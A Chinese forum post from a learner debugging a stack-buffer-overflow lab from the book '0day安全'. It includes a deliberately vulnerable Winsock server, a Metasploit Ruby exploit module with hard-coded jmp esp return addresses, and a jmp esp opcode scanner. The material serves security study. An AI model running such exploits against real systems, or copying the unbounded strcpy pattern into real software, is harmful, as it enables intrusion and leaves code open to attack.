这是0day2中用ruby开发一个模块的实验，我的问题是无法像书上那样成功弹出计算器。
希望各位能帮我看一下,我下面的操作是否有问题
目标主机为:52pojie的xp sp3
漏洞程序的编译器:vc6
主机是:windows 10
msf:msf5
在xp上运行的漏洞程序:
#include<iostream.h>
#include<winsock2.h>
#pragma comment(lib, "ws2_32.lib")
// Prints one received message after copying it into a fixed 200-byte stack buffer.
// buf: NUL-terminated text that came straight off the socket (untrusted, the
//      caller's buffer is 0x200 = 512 bytes).
// Returns nothing; output goes to stdout.
void msg_display(char * buf) {
char msg[200];
// DEFECT: unbounded strcpy from a 512-byte source into a 200-byte local is a
// classic stack buffer overflow; anything past byte 200 runs into the saved
// frame data and return address. Fix is a bounded copy:
//   strncpy(msg, buf, sizeof(msg) - 1); msg[sizeof(msg) - 1] = '\0';
// (or reject input with strlen(buf) >= sizeof(msg)). Stack canaries and
// DEP/NX are the compiler/OS mitigations that would catch or contain this.
strcpy(msg,buf);// overflow here, copy 0x200 to 200
cout<<"********************"<<endl;
cout<<"received:"<<endl;
cout<<msg<<endl;
}
// Entry point: a minimal TCP server on port 7777 that hands every received
// chunk to msg_display(). Never returns normally (outer loop is while(1));
// 'void main' is non-standard but accepted by VC6.
void main() {
// NOTE: socket()/accept() return SOCKET (unsigned) on Windows; storing them in
// int and testing <0 / ==-1 only works because INVALID_SOCKET casts to -1.
int sock,msgsock,lenth,receive_len;
struct sockaddr_in sock_server,sock_client;
char buf[0x200]; //noticed it is 0x200 — larger than the 200-byte copy target in msg_display
WSADATA wsa;
WSAStartup(MAKEWORD(1,1),&wsa);
if((sock=socket(AF_INET,SOCK_STREAM,0))<0) {
cout<<sock<<"socket creating error!"<<endl;
exit(1);
}
sock_server.sin_family=AF_INET;
sock_server.sin_port=htons(7777);
sock_server.sin_addr.s_addr=htonl(INADDR_ANY); // listens on every interface, not just loopback
// NOTE: a bind() failure is only logged; execution still continues into listen()/accept().
if(bind(sock,(struct sockaddr*)&sock_server,sizeof(sock_server))) {
cout<<"binging stream socket error!"<<endl;
}
cout<<"**************************************"<<endl;
cout<<" exploit target server 1.0 "<<endl;
cout<<"**************************************"<<endl;
listen(sock,4);
lenth=sizeof(struct sockaddr);
do{
msgsock=accept(sock,(struct sockaddr*)&sock_client,(int*)&lenth);
if(msgsock==-1) {
cout<<"accept error!"<<endl;
break;
} else
do {
// Zero-fill so a short read is NUL-terminated. A read that fills all 0x200
// bytes leaves no terminator, so the strcpy in msg_display reads past buf.
memset(buf,0,sizeof(buf));
// A recv() error (-1) is mapped to 0 so the inner loop ends like a peer close.
if((receive_len=recv(msgsock,buf,sizeof(buf),0))<0) {
cout<<"reading stream message erro!"<<endl;
receive_len=0;
}
msg_display(buf); // untrusted network data reaches the unbounded copy here
}while(receive_len); // recv() returning 0 (peer closed) ends this connection
closesocket(msgsock);
}while(1);
WSACleanup();
}
msf中exploit模块的ruby代码:
#!/usr/bin/env ruby
require 'msf/core'
# Metasploit remote exploit module for the lab server above.
# It sends a single TCP message whose layout is fixed by the module itself:
# 200 filler bytes, the 4-byte target-specific return address, then the payload.
class Metasploit3 < Msf::Exploit::Remote
include Exploit::Remote::Tcp
# Registers module metadata: name, platform, the per-OS 'Ret' address that
# overwrites the saved return address, and payload constraints
# (at most 250 bytes, no NUL byte since the copy is strcpy-terminated).
def initialize(info = {})
super(update_info(info,
'Name' => 'failwest_test',
'Platform' => 'win' ,
# 'Ret' is a hard-coded address inside a system DLL of one exact OS build and
# is only meaningful for that build — this fixed-address dependence is what
# ASLR is designed to break.
'Targets' => [
['Windows 2000', {'Ret' => 0x77F8948B } ],
['Windows XP SP3',{'Ret' => 0x77dc965b } ] ],
'Payload' => {
'Space' => 250,
'BadChars' => "\x00",
}))
end # initialize
# Connects, sends the crafted buffer, hands control to the payload handler,
# then disconnects. pack('V') encodes the address as 32-bit little-endian.
def exploit
connect
attack_buf = 'a'*200 + [target['Ret']].pack('V') + payload.encoded
sock.put(attack_buf)
handler
disconnect
end # exploit
end # Metasploit3
其中，xp的jmp esp地址0x77dc965b是我用下面的程序找到的，实际上就是书上的代码:
#include <windows.h>
#include <stdio.h>
#define DLL_NAME "user32.dll"
// Entry point: loads user32.dll and prints the address of every "FF E4"
// (jmp esp) byte pair in its mapped image, stopping at the first access fault.
// Declared int but falls off the end without a return statement.
int main() {
BYTE* ptr;
// NOTE: this outer 'address' is never used; both branches below declare
// their own 'address', shadowing it.
int position,address;
HINSTANCE handle;
BOOL done_flag = FALSE;
handle=LoadLibrary(DLL_NAME);
if(!handle) {
printf(" load dll erro !"); exit(0); // exit() comes from <stdlib.h>, which is not included here
}
ptr = (BYTE*)handle; // the module handle is the image base, so ptr walks the mapped DLL
// The scan has no length bound: it relies on reading past the mapped image
// raising an access violation that catch(...) receives. That only works when
// the compiler maps Win32 structured exceptions onto C++ catch(...)
// (VC6's default; later MSVC needs /EHa) — TODO confirm for the build used.
for(position = 0; !done_flag; position++) {
try {
if(ptr[position] == 0xFF && ptr[position+1] == 0xE4) {
//0xFFE4 is the opcode of jmp esp
int address = (int)ptr + position;
printf("OPCODE found at 0x%x\n",address);
}
}
catch(...) {
int address = (int)ptr + position;
printf("END OF 0x%x\n", address);
done_flag = true; // BOOL is an int typedef, so assigning C++ 'true' is fine
}
}
}